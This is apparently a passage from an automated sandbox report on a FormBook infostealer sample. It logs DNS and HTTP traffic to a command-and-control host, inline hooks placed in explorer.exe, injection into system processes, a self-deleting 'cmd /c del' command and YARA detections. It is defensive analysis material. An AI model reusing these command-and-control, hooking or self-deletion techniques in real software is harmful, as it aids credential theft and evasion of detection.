                                      Sep 27, 2021 14:08:07.315135956 CEST6238953192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:07.329541922 CEST53623898.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:26.762648106 CEST4991053192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:26.839148998 CEST53499108.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:27.530270100 CEST5585453192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:27.551716089 CEST53558548.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:28.074493885 CEST6454953192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:28.087434053 CEST53645498.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:28.710818052 CEST6315353192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:28.724102020 CEST53631538.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:28.742738962 CEST5299153192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:28.769083977 CEST53529918.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:29.040502071 CEST5370053192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:29.143783092 CEST53537008.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:29.608655930 CEST5172653192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:29.670341015 CEST53517268.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:30.186027050 CEST5679453192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:30.199626923 CEST53567948.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:30.651643991 CEST5653453192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:30.664815903 CEST53565348.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:32.006190062 CEST5662753192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:32.020279884 CEST53566278.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:32.689856052 CEST5662153192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:32.702795029 CEST53566218.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:33.107525110 CEST6311653192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:33.186486959 CEST53631168.8.8.8192.168.2.4
                                      Sep 27, 2021 14:08:43.796036005 CEST6407853192.168.2.48.8.8.8
                                      Sep 27, 2021 14:08:43.814069986 CEST53640788.8.8.8192.168.2.4
                                      Sep 27, 2021 14:09:05.803047895 CEST6480153192.168.2.48.8.8.8
                                      Sep 27, 2021 14:09:05.840178967 CEST53648018.8.8.8192.168.2.4
                                      Sep 27, 2021 14:09:17.229307890 CEST6172153192.168.2.48.8.8.8
                                      Sep 27, 2021 14:09:17.260358095 CEST53617218.8.8.8192.168.2.4
                                      Sep 27, 2021 14:09:18.574887037 CEST5125553192.168.2.48.8.8.8
                                      Sep 27, 2021 14:09:18.603625059 CEST53512558.8.8.8192.168.2.4
                                      Sep 27, 2021 14:09:24.108165026 CEST6152253192.168.2.48.8.8.8
                                      Sep 27, 2021 14:09:24.331362009 CEST53615228.8.8.8192.168.2.4
                                      Sep 27, 2021 14:09:50.587238073 CEST5233753192.168.2.48.8.8.8
                                      Sep 27, 2021 14:09:50.620434999 CEST53523378.8.8.8192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Sep 27, 2021 14:09:05.803047895 CEST192.168.2.48.8.8.80xc3f5Standard query (0)www.sherwoodmastiff.comA (IP address)IN (0x0001)
                                      Sep 27, 2021 14:09:24.108165026 CEST192.168.2.48.8.8.80x48b9Standard query (0)www.kingtreemusic.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Sep 27, 2021 14:09:05.840178967 CEST8.8.8.8192.168.2.40xc3f5No error (0)www.sherwoodmastiff.comsherwoodmastiff.comCNAME (Canonical name)IN (0x0001)
                                      Sep 27, 2021 14:09:05.840178967 CEST8.8.8.8192.168.2.40xc3f5No error (0)sherwoodmastiff.com160.153.136.3A (IP address)IN (0x0001)
                                      Sep 27, 2021 14:09:24.331362009 CEST8.8.8.8192.168.2.40x48b9Name error (3)www.kingtreemusic.comnonenoneA (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.sherwoodmastiff.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.449816160.153.136.380C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Sep 27, 2021 14:09:05.876187086 CEST5733OUTGET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1
                                      Host: www.sherwoodmastiff.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 27, 2021 14:09:05.902458906 CEST5734INHTTP/1.1 400 Bad Request
                                      Connection: close


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE9
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE9
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE9
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE9

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: EH5ro3Hyug.exe PID: 6400 Parent PID: 6056

                                      General

                                      Start time:14:07:41
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\EH5ro3Hyug.exe'
                                      Imagebase:0x810000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689245304.0000000002C6F000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Analysis Process: EH5ro3Hyug.exe PID: 5412 Parent PID: 6400

                                      General

                                      Start time:14:07:51
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Imagebase:0xc0000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Analysis Process: EH5ro3Hyug.exe PID: 5660 Parent PID: 6400

                                      General

                                      Start time:14:07:51
                                      Start date:27/09/2021
                                      Path:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\EH5ro3Hyug.exe
                                      Imagebase:0xf20000
                                      File size:860672 bytes
                                      MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 5660

                                      General

                                      Start time:14:07:53
                                      Start date:27/09/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff6fee60000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      Analysis Process: autoconv.exe PID: 7104 Parent PID: 3424

                                      General

                                      Start time:14:08:19
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\autoconv.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\SysWOW64\autoconv.exe
                                      Imagebase:0xd50000
                                      File size:851968 bytes
                                      MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Analysis Process: WWAHost.exe PID: 7092 Parent PID: 3424

                                      General

                                      Start time:14:08:20
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\WWAHost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                      Imagebase:0x9b0000
                                      File size:829856 bytes
                                      MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      Analysis Process: cmd.exe PID: 4972 Parent PID: 7092

                                      General

                                      Start time:14:08:24
                                      Start date:27/09/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 5548 Parent PID: 4972

                                      General

                                      Start time:14:08:24
                                      Start date:27/09/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >